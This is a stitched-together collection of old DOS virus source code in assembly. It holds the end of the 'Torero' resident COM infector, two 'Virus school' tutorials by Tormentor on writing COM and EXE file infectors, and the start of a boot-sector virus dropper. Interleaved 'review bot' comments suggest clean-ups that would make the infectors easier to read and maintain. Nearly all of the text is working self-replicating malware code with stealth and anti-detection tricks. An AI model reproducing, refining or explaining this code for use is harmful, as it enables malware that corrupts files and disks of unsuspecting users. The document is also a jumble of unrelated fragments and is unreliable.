old_int_13h dw ?,? ; original int 13h
|
||||
|
||||
sector_write: push ax bx cx
|
||||
pushf
|
||||
|
||||
xor ah,ah ; Calculate how many
|
||||
mov cl,4 ; files we must test
|
||||
shl ax,cl ; by multiplying the
|
||||
mov cx,ax ; sector number with
|
||||
or cx,cx ; 10h (entries)
|
||||
je bucle_end
|
||||
|
||||
int_13h_bucle: cmp byte ptr es:[bx+9],'O' ; -O-?
|
||||
jne more_files
|
||||
|
||||
mov al,byte ptr es:[bx+9]
|
||||
sub al,2
|
||||
cmp al,byte ptr es:[bx+0ah] ; -OM?
|
||||
jne more_files
|
||||
cmp al,'M' ; Then it's a COM
|
||||
je subtract
|
||||
|
||||
more_files: add bx,20h ; Look for more files
|
||||
loop int_13h_bucle ; Look'n'loop :)
|
||||
|
||||
bucle_end: popf
|
||||
pop cx bx ax ; End of the bucle
|
||||
; Call the original
|
||||
call int_13h ; int 13h and jump
|
||||
xor_and_jump: xor ax,ax ; to the original int
|
||||
|
||||
return_to_int: push bp ax
|
||||
pushf
|
||||
|
||||
pop ax ; Return to the
|
||||
mov bp,sp ; original int 13h
|
||||
mov word ptr ss:[bp+8],ax
|
||||
|
||||
pop ax bp
|
||||
retf 2
|
||||
|
||||
subtract: cmp byte ptr es:[bx],0e5h ; A deleted file...
|
||||
je more_files ; bah, skip it
|
||||
|
||||
cmp byte ptr es:[bx+0bh],80h ; Infected?
|
||||
jb more_files
|
||||
|
||||
cmp word ptr es:[bx+0ch],0 ; Is the header field
|
||||
jne more_files ; empty?
|
||||
|
||||
cmp word ptr es:[bx+0eh],0
|
||||
jne more_files
|
||||
|
||||
mov ax,word ptr cs:[header_store] ; Ok, let's copy
|
||||
mov word ptr es:[bx+0ch],ax ; the original file
|
||||
; header to the
|
||||
mov ax,word ptr cs:[header_store+2] ; directory entry
|
||||
mov word ptr es:[bx+0eh],ax
|
||||
jmp more_files
|
||||
|
||||
; ÄÄ´ Torero's signature ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
signature db 0dh,0ah,'[Torero €:-) by Mister Sandman/29A]',0dh,0ah
|
||||
|
||||
; ÄÄ´ Torero's int 21h handler ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
new_int_21h: cli
|
||||
cmp ah,6ch ; This code is stolen
|
||||
ja real_checks ; from the original
|
||||
; DOS kernel handler,
|
||||
cmp ah,33h ; so they won't catch
|
||||
jb real_checks ; us if they don't go
|
||||
jz fake_stuff ; further thru the
|
||||
; rest of the code of
|
||||
cmp ah,64h ; the handler... thanx
|
||||
ja fake_stuff ; to Qark for this
|
||||
jz real_checks ; cool idea :)
|
||||
|
||||
cmp ah,51h
|
||||
jz real_checks
|
||||
|
||||
cmp ah,62h
|
||||
jz fake_stuff
|
||||
|
||||
cmp ah,50h
|
||||
jz real_checks
|
||||
|
||||
fake_stuff: push ax bx cx ; Shit, shit, shit,
|
||||
nop ; shit... skip it
|
||||
pop cx bx ax
|
||||
|
||||
real_checks: cmp ah,30h
|
||||
jne opening ; (get DOS version)?
|
||||
|
||||
mov bx,';)' ; Return the smiley :)
|
||||
iret
|
||||
|
||||
opening: cmp ah,3dh ; File opening?
|
||||
je file_open
|
||||
|
||||
cmp ax,4301h ; Attribute change?
|
||||
je new_attribute
|
||||
|
||||
cmp ax,6c00h ; Extended open?
|
||||
je file_open
|
||||
|
||||
jmp_int_21h db 0eah ; Jump to the original
|
||||
old_int_21h dw ?,? ; int 21h address
|
||||
|
||||
; ÄÄ´ File open ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
file_open: call infect_file ; Infection routine
|
||||
jmp dword ptr cs:[old_int_21h] ; Jump back to int 21h
|
||||
|
||||
; ÄÄ´ New attribute ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
new_attribute: mov ah,30h ; Change 43h for 30h
|
||||
iret ; so it will do nothing
|
||||
|
||||
; ÄÄ´ Infection routine ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
infect_file: pushf
|
||||
push ax bx cx dx ; Push registers, flags
|
||||
push si di ds es ; and all that shit
|
||||
|
||||
call set_int_24h ; Set int 24h
|
||||
|
||||
cmp ah,6ch ; Extended open?
|
||||
jne normal_open
|
||||
|
||||
mov dx,si ; Fix it to DS:DX
|
||||
normal_open: mov ax,3d00h ; Open the file
|
||||
call int_21h
|
||||
xchg bx,ax ; File handle in BX
|
||||
|
||||
push cs ; CS=DS
|
||||
pop ds
|
||||
|
||||
call get_sft ; Get file's SFT
|
||||
call check_mark ; Already infected?
|
||||
jae close_and_pop
|
||||
|
||||
mov byte ptr es:[di+2],2 ; Open mode=r/w
|
||||
mov ax,word ptr es:[di+28h] ; Check the extension
|
||||
cmp ax,'OC' ; of our victim
|
||||
jne close_and_pop
|
||||
|
||||
mov byte ptr cs:[infecting],1
|
||||
mov ah,3fh ; Read the first three
|
||||
mov cx,3 ; bytes to our temporal
|
||||
lea dx,header_store ; header store
|
||||
call int_21h
|
||||
|
||||
mov ax,word ptr es:[di+11h] ; File lenght in AX
|
||||
cmp ax,0ea60h ; Too big file?
|
||||
ja close_and_pop
|
||||
|
||||
push ax ; Lseek to the end of
|
||||
call lseek_end ; the file
|
||||
|
||||
mov ah,40h ; Append our k-r4d
|
||||
mov cx,torero_size ; code :)
|
||||
lea dx,torero_start
|
||||
call int_21h
|
||||
|
||||
pop ax ; Make the jmp to
|
||||
sub ax,3 ; our virus body
|
||||
mov word ptr cs:[com_header+1],ax ; for the new file
|
||||
call set_marker
|
||||
|
||||
call lseek_start ; Lseek to the start
|
||||
|
||||
mov ah,40h ; Write the new header
|
||||
mov cx,3 ; in so we'll be always
|
||||
lea dx,com_header ; executed first ;P
|
||||
call int_21h
|
||||
|
||||
mov ax,word ptr es:[di+11h] ; Actual size in AX
|
||||
sub ax,3 ; Lseek to the position
|
||||
call lseek_end ; of the original header
|
||||
|
||||
mov ah,40h ; Destroy all the info,
|
||||
mov cx,3 ; already stored in the
|
||||
lea dx,garbage ; directory entry };)
|
||||
call int_21h
|
||||
|
||||
close_and_pop: mov ah,3eh ; Close the file
|
||||
call int_21h
|
||||
|
||||
call reset_int_24h ; Reset int 24h
|
||||
|
||||
pop es ds di si ; And pop out all the
|
||||
pop dx cx bx ax ; shit we pushed b4
|
||||
popf
|
||||
ret
|
||||
|
||||
; ÄÄ´ Call to the original int 13h ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
int_13h: pushf
|
||||
call dword ptr cs:[old_int_13h] ; Call the original
|
||||
ret ; int 13h
|
||||
|
||||
; ÄÄ´ Call to the original int 21h ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
int_21h: pushf
|
||||
call dword ptr cs:[old_int_21h] ; Call the original
|
||||
ret ; int 21h
|
||||
|
||||
; ÄÄ´ Get SFT in ES:DI ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
get_sft: push ax bx
|
||||
mov ax,1220h ; Get job file table
|
||||
int 2fh ; in ES:DI (DOS 3+)
|
||||
jc bad_sft
|
||||
|
||||
xor bx,bx ; Get the address of
|
||||
mov ax,1216h ; the specific SFT for
|
||||
mov bl,byte ptr es:[di] ; our handle
|
||||
int 2fh
|
||||
|
||||
bad_sft: pop bx ax ; Pop registers and
|
||||
ret ; return to the code
|
||||
|
||||
; ÄÄ´ Check our infection mark ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
check_mark: cmp byte ptr es:[di+4],80h ; Compare with the min.
|
||||
ret ; value of our mark
|
||||
|
||||
; ÄÄ´ Read the directory entry ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
read_entry: push ax bx cx
|
||||
call parameters ; Load the sector
|
||||
int 25h
|
||||
|
||||
pop cx cx bx ax
|
||||
ret
|
||||
|
||||
; ÄÄ´ Sector loading ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
parameters: mov ax,word ptr es:[di+1bh] ; Load the sector
|
||||
mov word ptr cs:[control_block],ax ; number in our
|
||||
mov ax,word ptr es:[di+1dh] ; control block
|
||||
mov word ptr cs:[control_block+2],ax ; Read a long
|
||||
mov cx,0ffffh ; sector, 4 bytes
|
||||
|
||||
push cs ; CS=DS
|
||||
pop ds
|
||||
|
||||
mov word ptr cs:[control_block+4],1 ; One sector
|
||||
mov word ptr cs:[control_block+6],offset sector
|
||||
mov word ptr cs:[control_block+8],cs
|
||||
lea bx,control_block ; Control block
|
||||
|
||||
push ds si
|
||||
lds si,dword ptr es:[di+7] ; Point to the
|
||||
lodsb ; DPB
|
||||
pop si ds
|
||||
ret
|
||||
|
||||
; ÄÄ´ Point to the original header ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
point_entry: mov al,byte ptr es:[di+1fh] ; Guess the entry
|
||||
xor ah,ah
|
||||
|
||||
push cx
|
||||
mov cl,5 ; Multiply it*20h
|
||||
shl ax,cl
|
||||
pop cx
|
||||
|
||||
lea si,sector ; Calculate its offset
|
||||
add si,ax ; into the sector and
|
||||
add si,0ch ; move to si+0ch (header)
|
||||
ret
|
||||
|
||||
; ÄÄ´ Set int 24h ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
set_int_24h: push ax si di
|
||||
push ds es
|
||||
|
||||
xor ax,ax ; Point to the IVT
|
||||
mov ds,ax
|
||||
|
||||
push cs ; CS=ES
|
||||
pop es
|
||||
|
||||
mov si,24h*4 ; Save the original int
|
||||
mov di,offset old_int_24h ; 24h address and set
|
||||
cld ; ours l8r
|
||||
movsw
|
||||
movsw
|
||||
|
||||
mov word ptr [si-4],offset new_int_24h
|
||||
mov word ptr [si-2],cs
|
||||
|
||||
pop es ds
|
||||
pop di si ax
|
||||
ret
|
||||
|
||||
; ÄÄ´ Restore int 24h ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
reset_int_24h: push ax si di
|
||||
push ds es
|
||||
|
||||
xor ax,ax ; Point to the IVT
|
||||
mov es,ax
|
||||
|
||||
push cs ; CS=DS
|
||||
pop ds
|
||||
|
||||
mov si,offset old_int_24h ; Restore the original
|
||||
mov di,24h*4 ; int 24h address
|
||||
cld
|
||||
movsw
|
||||
movsw
|
||||
|
||||
pop es ds
|
||||
pop di si ax
|
||||
ret
|
||||
|
||||
; ÄÄ´ Torero's int 24h handler ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
new_int_24h: mov al,3 ; Pass the error code
|
||||
iret
|
||||
|
||||
old_int_24h: dw ?,? ; Original int 24h
|
||||
|
||||
; ÄÄ´ Set our infection mark ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
set_marker: mov byte ptr es:[di+4],80h ; Attribute bit 8
|
||||
ret
|
||||
|
||||
; ÄÄ´ Lseek to the start of the file ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
lseek_start: mov word ptr es:[di+15h],0 ; Read pointer=0
|
||||
ret
|
||||
|
||||
; ÄÄ´ Lseek to the end of the file ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
lseek_end: mov word ptr es:[di+15h],ax ; Read pointer=file
|
||||
ret ; length (EOF)
|
||||
|
||||
; ÄÄ´ Open the host we're being executed from ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
open_host: mov ah,62h ; Get PSP address
|
||||
int 21h
|
||||
|
||||
push es
|
||||
mov ds,bx
|
||||
mov bx,word ptr ds:[2ch] ; DS:2ch=PSP segment
|
||||
mov es,bx
|
||||
xor di,di
|
||||
|
||||
mov al,1 ; Look for 01h (the
|
||||
mov cx,0ffffh ; mark which sepparates
|
||||
repnz scasb ; the path from the
|
||||
jnz emergency ; name of the file that
|
||||
; is being executed)
|
||||
xor al,al
|
||||
scasb
|
||||
|
||||
push es
|
||||
pop ds es
|
||||
|
||||
mov ah,3dh ; Open the host
|
||||
mov dx,di
|
||||
call int_21h
|
||||
xchg bx,ax ; Pass handle to BX
|
||||
ret ; and return
|
||||
|
||||
; ÄÄ´ Emergency routine... data lost! ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
emergency: push cs ; CS=DS
|
||||
pop ds
|
||||
|
||||
mov ah,9 ; Show the message...
|
||||
lea dx,windows ; This programs requires
|
||||
int 21h ; Microsoft Windows
|
||||
|
||||
mov ax,4c01h ; Errorlevel=01 :)
|
||||
int 21h
|
||||
|
||||
; ÄÄ´ Data area ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
sector db 200h dup (?) ; The long sector
|
||||
|
||||
control_block dd ? ; Control block
|
||||
dw ?
|
||||
garbage dd ?
|
||||
db ';)'
|
||||
|
||||
windows db 'This program requires Microsoft Windows.'
|
||||
db 0dh,0ah,'$'
|
||||
|
||||
action db ? ; Reading or writing?
|
||||
infecting db ?
|
||||
|
||||
com_header db 0e9h,?,? ; The COM header
|
||||
header_store db 3 dup (?) ; Temporal header store
|
||||
|
||||
torero_end label byte
|
||||
|
||||
torero ends
|
||||
end torero_start
|
|
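--- /dev/null
+++ b/PLACEHOLDER_PATH_SECTION_2
@@ -0,0 +1,158 @@
+;
+; Virus school, lession 1 (c) 1992 Tormentor [Demoralized Youth]
+;
+; This is the first lession on how to make an own virus.
+; Hope you'll learn something of it...
+; To be compiled with TASM 3.0 or higher.
+;
+; This virus is quite dumb and 'noisy'
+; It updates the filedate and time, changes DTA before execution causing
+; some progs to belive they are executed with parameters...
+; But this should only be a 'raw' virus that you can develop.
+; Certain program may hang, so i recommend you not to spread to geeks
+; since there is MANY better viruses to use for such nice purpose.
+;
+; If you want to conntact me or other virus-writers call me on my board:
+; Swedish Virus Laboratory +46-3191-9393
+;
+; Greetings to All virus-writers!
+;
+
+
+.model tiny
+.radix 16
+.code
+
+Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
+
+org 100
+
+dummy_code: db 'M' ; Mark file as infected.
+db 3 DUP(90) ; This is to simulate a infected prog.
+; Not included in virus-code.
+
+Virus_Start: call where_we_are ; Now we call the next bytes, just to
+; know what address virus lies on.
+where_we_are: pop si ; Since the virus-code's address will
+; differ from victim to victim.
+; a POP SI after a call will give us the
+; address which equals to 'where_we_are'
+; Very important.
+
+;-----------------------------------------------------------------------
+; Now we have to put back the original 4 bytes in the host program, so
+; we can return control to it later:
+
+add si,_4first_bytes-where_we_are
+mov di,100
+cld
+movsw
+movsw
+
+;------------------------------------------------------------------------
+
+; We have to use SI as a reference since files differ in size thus making
+; virus to be located at different addresses.
+
+sub si,_4first_bytes-Virus_Start+4
+
+;------------------------------------------------------------------------
+; Now we just have to find victims, we will look for ALL .COM files in
+; the current directory.
+
+mov ah,4e ; We start to look for a *.COM file
+look4victim: mov dx,offset file_match-Virus_Start
+add dx,si
+int 21
+
+jc no_victim_found ; If no *.COM files was found.
+
+mov ax,3d02 ; Now we open the file.
+mov dx,9e ; The found victims name is at ds:009e
+int 21 ; in DTA.
+
+jc cant_open_file ; If file couldn't be open.
+
+xchg ax,bx ; Save filehandle in bx
+; (we could use MOV BX,AX but we saves one byte by using xchg )
+
+mov ah,3f ; Now we read the first 4 bytes
+mov cx,4 ; from the victim -> buffer
+
+mov dx,offset _4first_bytes-Virus_Start
+add dx,si
+; We will then overwrite them with
+int 21 ; a JMP XXXX to virus-code at end.
+
+jc read_error
+
+cmp byte ptr ds:[si+_4first_bytes-Virus_Start],'M'
+jz sick_or_EXE ; Check if infected OR *.EXE
+; Almost all EXE files starts with 'M' and we mark the infected files by
+; starting with 'M' which equals to DEC BP
+; Now we just have to have one check instead of 2 (infected and *.EXE)
+
+mov ax,4202 ; Position file-pointer to point at
+xor cx,cx ; End-of-File.
+xor dx,dx ; Any writing to file will now APPEND it
+int 21 ; Returns AX -> at end.
+
+sub ax,4 ; Just for the JMP structure.
+
+mov word ptr ds:[_4new_bytes+2],ax
+; Build new JMP XXXX to virus.
+; ( logic: JMP AX )
+
+mov ah,40 ; Append file with virus code.
+mov cx,offset Virus_Lenght
+; File-size will increase with
+mov dx,si ; Virus_Lenght.
+int 21
+
+jc write_error
+
+mov ax,4200 ; Position file-pointer to begin of file
+xor cx,cx ; So we can change the first 3 bytes
+xor dx,dx ; to JMP to virus.
+int 21
+
+mov ah,40 ; Write new 3 bytes.
+mov cx,4 ; After this, executing the file will
+mov dx,offset _4new_bytes-Virus_Start
+add dx,si
+; result in virus-code executing before
+int 21 ; original code.
+; (And more files will be infected)
+
+jc write_error
+
+mov ah,3e ; Close file, now file is infected.
+int 21 ; Dos function 3E (close handle)
+
+Sick_or_EXE: mov ah,4f ; Well, file is infected. Now let's
+jmp look4victim ; find another victim...
+
+write_error: ; Here you can test whats went wrong.
+read_error: ; This is just for debugging purpose.
+cant_open_file: ; These entries are equal to eachother
+no_victim_found: ; but could be changed if you need to test something.
+
+mov ax,100 ; Every thing is put back in memory,
+push ax ; lets us RET back to start of program
+ret ; and execute the original program.
+
+notes db ' (c) 1992 Tormentor ,Swedish Virus Laboratory'
+db ' / Demoralized Youth / '
+
+file_match db '*.COM',0 ; Pattern to search for.
+; Don't forget to end with 0 !
+
+_4first_bytes: ret ; Here we save the 4 first org. bytes
+db 3 DUP(0)
+; We have a ret here since this file isn't a REAL infection.
+
+_4new_bytes db 'M',0E9, 00, 00 ; Here we build the 4 new org. bytes
+; so our virus-code will be run first.
+Virus_End EQU $
+
+end dummy_code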
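Review bot: The comment on `mov ah,40 ; Write new 3 bytes.` contradicts the code — `mov cx,4` writes four bytes (the `'M'` marker plus the three-byte JMP), and the comment a few lines earlier, `So we can change the first 3 bytes`, has the same mismatch; suggest `; Write the 4 new bytes (marker + JMP)`. `mov cx,offset Virus_Lenght` applies `offset` to an EQU that is already a length expression, whereas the companion lesson-2 listing in this commit writes `mov cx,Virus_Lenght`; dropping `offset` makes the two consistent and stops the operand from reading as an address. Because `.radix 16` is in force, every unprefixed number in the listing (`org 100`, `int 21`, `3d02`, `9e`, `4202`) is hexadecimal, which the header comment never states; a line such as `; NOTE: .radix 16 - every unprefixed number below is hex` near the top would spare readers who compare this against a decimal-radix listing.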
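--- /dev/null
+++ b/PLACEHOLDER_PATH_SECTION_3
@@ -0,0 +1,160 @@
+;
+; Virus Lession #2 'How to make a non-resident EXE infector'
+;
+; (c) 1992 Tormentor // Demoralized Youth
+;
+; Well, I had not time to comment this code as much as I wanted to,
+; but here you are.
+; What can be hard to understand is the .EXE header changes, but if
+; you look at the description on the header (ex: Norton guide Tech. Ref)
+; you'll understand...
+; Anyway, feel free to use this example and if you have any questions
+; or anything call my board: Swedish Virus Labratory +46-3191-9393
+;
+; Greetings to all virus-writers!
+;
+; /Tormentor
+;
+
+
+
+.model tiny
+.radix 16
+.code
+
+Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
+
+org 100
+
+Virus_Start: call where_we_are
+
+where_we_are: pop si
+
+sub si,where_we_are-Virus_Start
+
+mov ax,es
+add ax,10
+add ax,cs:[si+Exe_header-Virus_Start+16]
+push ax
+push cs:[si+Exe_header-Virus_Start+14]
+
+push ds
+push cs
+pop ds
+
+mov ah,1a
+mov dx,offset Own_dta-Virus_Start
+add dx,si
+int 21
+
+mov ah,4e ; We start to look for a *.EXE file
+look4victim: mov dx,offset file_match-Virus_Start
+add dx,si
+int 21
+
+jnc cont2
+jmp no_victim_found ; If no *.EXE files was found.
+
+cont2: mov ax,3d02
+mov dx,Own_dta-Virus_Start+1e
+add dx,si
+int 21
+
+jnc cont1
+jmp cant_open_file
+
+cont1: xchg ax,bx
+
+mov ah,3f
+mov cx,1c
+mov dx,offset Exe_header-Virus_Start
+add dx,si
+int 21
+
+jc read_error
+
+cmp byte ptr ds:[si+Exe_header-Virus_Start],'M'
+jnz no_exe ; !!! Some EXEs starts with ZM !!!
+cmp word ptr ds:[si+Exe_header-Virus_Start+12],'DY'
+jz infected
+
+mov ax,4202 ; Go EOF
+xor cx,cx
+xor dx,dx
+int 21
+
+push dx
+push ax
+
+mov ah,40 ; Write virus to EOF.
+mov cx,Virus_Lenght
+mov dx,si
+int 21
+
+mov ax,4202 ; Get NEW filelenght.
+xor cx,cx
+xor dx,dx
+int 21
+
+mov cx,200
+div cx
+inc ax
+mov word ptr ds:[Exe_header-Virus_Start+2+si],dx
+mov word ptr ds:[Exe_header-Virus_Start+4+si],ax
+
+pop ax
+pop dx
+
+mov cx,10
+div cx
+sub ax,word ptr ds:[Exe_header-Virus_Start+8+si]
+mov word ptr ds:[Exe_header-Virus_Start+16+si],ax
+mov word ptr ds:[Exe_header-Virus_Start+14+si],dx
+
+mov word ptr ds:[Exe_header-Virus_Start+12+si],'DY'
+
+mov ax,4200 ; Position file-pointer to begin of file
+xor cx,cx
+xor dx,dx
+int 21
+
+mov ah,40 ; Write header
+mov cx,1c
+mov dx,offset Exe_header-Virus_Start
+add dx,si
+int 21
+
+jc write_error
+
+no_exe:
+infected:
+mov ah,3e
+int 21
+
+Sick_or_EXE: mov ah,4f
+jmp look4victim
+
+write_error: ; Here you can test whats went wrong.
+read_error: ; This is just for debugging purpose.
+cant_open_file: ; These entries are equal to eachother
+no_victim_found: ; but could be changed if you need to test something.
+
+pop ds
+retf
+
+file_match db '*.EXE',0 ; Pattern to search for.
+; Don't forget to end with 0 !
+
+Exe_header db 16 DUP(0)
+dw 0fff0 ; Adjustment just for this COM-file.
+db 4 DUP(0)
+
+notes db '(c) 1992 Tormentor / Demoralized Youth ',0a,0d
+db 'Rather first in hell, than second in heaven.'
+
+Own_Dta db 02bh DUP(0)
+
+Virus_End EQU $
+
+end Virus_Start
+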
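Review bot: The MZ header is patched through bare offsets (`+2`, `+4`, `+8`, `+12`, `+14`, `+16`) with no names, and since `.radix 16` is in force they are hex (`+16` is 22 decimal, the initial-CS field; `+14` is initial IP; `+12` is the checksum word), which is easy to misread against the decimal field tables the header comment sends readers to. Naming them with `EQU` constants (e.g. `EXE_LASTPAGE EQU 2`, `EXE_PAGES EQU 4`, `EXE_HDRPARAS EQU 8`, `EXE_CHECKSUM EQU 12`, `EXE_IP EQU 14`, `EXE_CS EQU 16`) would supply the documentation the header comment admits is missing. The `'DY'` compared and later stored at `+12` reuses the checksum field as the already-infected marker, which the listing never says; `; checksum word doubles as the 'DY' infection mark` next to the `jz infected` check would make it self-explanatory. The two `div cx` instructions intentionally leave DX uncleared because DX:AX holds the 32-bit position returned by function 4202h (and the popped copy of it the second time); a comment there, `; DX:AX = file length from 4202h`, would stop a reader from "fixing" it with `xor dx,dx`.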
@ -0,0 +1,543 @@
|
|||
code_seg segment
|
||||
assume cs:code_seg,ds:code_seg
|
||||
|
||||
org 100h
|
||||
|
||||
tormentor proc far
|
||||
|
||||
@disp macro string
|
||||
mov dx,offset string
|
||||
mov ah,09h
|
||||
int 21h
|
||||
endm
|
||||
|
||||
@exit macro
|
||||
mov ax,4c00h
|
||||
int 21h
|
||||
endm
|
||||
|
||||
@cls macro mode
|
||||
mov ah,00h
|
||||
mov al,mode
|
||||
int 10h
|
||||
endm
|
||||
|
||||
start: jmp main
|
||||
|
||||
boot_area dw 256 dup (0)
|
||||
boot_sec dw 512 dup (0)
|
||||
|
||||
message db "Tormentor Strain A",13,10
|
||||
db "Written by The High Evolutionary",13,10
|
||||
db "Copyright (C) 1991 by The RABID Nat'nl Development Corp."
|
||||
db 13,10,13,10
|
||||
db "Press any key to install onto media in drive A:",13,10
|
||||
db "(Or press CTRL-C to abort)$",13,10
|
||||
|
||||
paused db 13,10,13,10
|
||||
db "[Paused] Insert destination disk if desired and press",13,10
|
||||
db "any key, otherwise, press any key$",13,10
|
||||
|
||||
done db "Done!$",13,10
|
||||
|
||||
r_fail db 13,10,13,10
|
||||
db "Failed to READ in boot sector$",13,10
|
||||
|
||||
w_fail db 13,10,13,10
|
||||
db "Failed to WRITE boot sector$",13,10
|
||||
|
||||
f_infec db 13,10,13,10
|
||||
db "SHIT! We failed to write the virus code to the disk!!!$",13,10
|
||||
|
||||
r_boot db 13,10,13,10
|
||||
db "Now READING in the boot sector$",13,10
|
||||
|
||||
w_boot db 13,10,13,10
|
||||
db "Now WRITING the boot sector to track 719$",13,10
|
||||
|
||||
w_vir db 13,10,13,10
|
||||
db "Now WRITING the VIRUS to the boot sector$",13,10
|
||||
|
||||
succ db 13,10,13,10
|
||||
db "Success! We installed Tormentor onto the drive$",13,10
|
||||
|
||||
memerr db 13,10,13,10
|
||||
db "BOMB! We had a memory allocation error. Bailing out...$",13,10
|
||||
db 13,10
|
||||
|
||||
read_shit db 13,10,13,10
|
||||
db "Reading in shit via INT 25...$",13,10
|
||||
db 13,10
|
||||
|
||||
intro db "You are in Torment$",13,10
|
||||
|
||||
bootseg dw ? ; Storage segment address or mem. block
|
||||
; containing copy of boot record
|
||||
|
||||
dssave dw ? ; Storage for DS register
|
||||
;dssave dw seg group ; Storage for DS register
|
||||
|
||||
pspseg dw ? ; PSP segment storage
|
||||
|
||||
;stack segment para stack 'STACK' ; Code Segment
|
||||
;stack ends
|
||||
|
||||
;_data segment word public 'DATA' ; Data Segment
|
||||
;_data ends
|
||||
|
||||
;dgroup group data,stack ; Define segment group
|
||||
|
||||
;*****************************************************************************
|
||||
; Boot record information to infect both floppies and hard-drives
|
||||
;*****************************************************************************
|
||||
|
||||
bootrecord struc
|
||||
bootjump db 3 dup (?) ; Initial 3 byte jmp instruction
|
||||
oemstring db 8 dup (?) ; OEM version and DOS
|
||||
sectorbytes dw ? ; Bytes per sector
|
||||
clustersec db ? ; Sectors per cluster
|
||||
reservedrec dw ? ; Reserved sectors
|
||||
fatcopies db ? ; number of FAT copies
|
||||
direntries dw ? ; number of root dir entries
|
||||
totalsectors dw ? ; Total disk sectors
|
||||
mediadescrip db ? ; Media Descriptor
|
||||
fatsectors dw ? ; number of sectors occupied by 1 FAT
|
||||
tracksectors dw ? ; number of sectors per track
|
||||
heads dw ? ; number of heads
|
||||
hiddensectors dw ? ; number of hidden sectors
|
||||
bootrecord ends
|
||||
|
||||
drive db ? ; Current drive pointer
|
||||
|
||||
memalloc proc near
|
||||
|
||||
push bp ; Save base pointer
|
||||
push bx ; Save BX
|
||||
mov bp,sp ; init base pointer
|
||||
xor al,al ; Zero out AL
|
||||
mov ah,48h ; Allocate mem. function
|
||||
int 21h
|
||||
jnc end_memalloc ; exit if no error
|
||||
mov word ptr [bp],bx
|
||||
|
||||
end_memalloc:
|
||||
pop bx ; Restore BX
|
||||
pop bp ; Restore Base Pointer
|
||||
ret
|
||||
|
||||
memalloc endp
|
||||
|
||||
main:
|
||||
|
||||
get_default_drive:
|
||||
mov ah,19h
|
||||
int 21h
|
||||
mov byte ptr drive,al ; Move current drive into drive
|
||||
|
||||
|
||||
; mov ds,dssave ; Initialise DS
|
||||
; mov ax,es ; get PSP address
|
||||
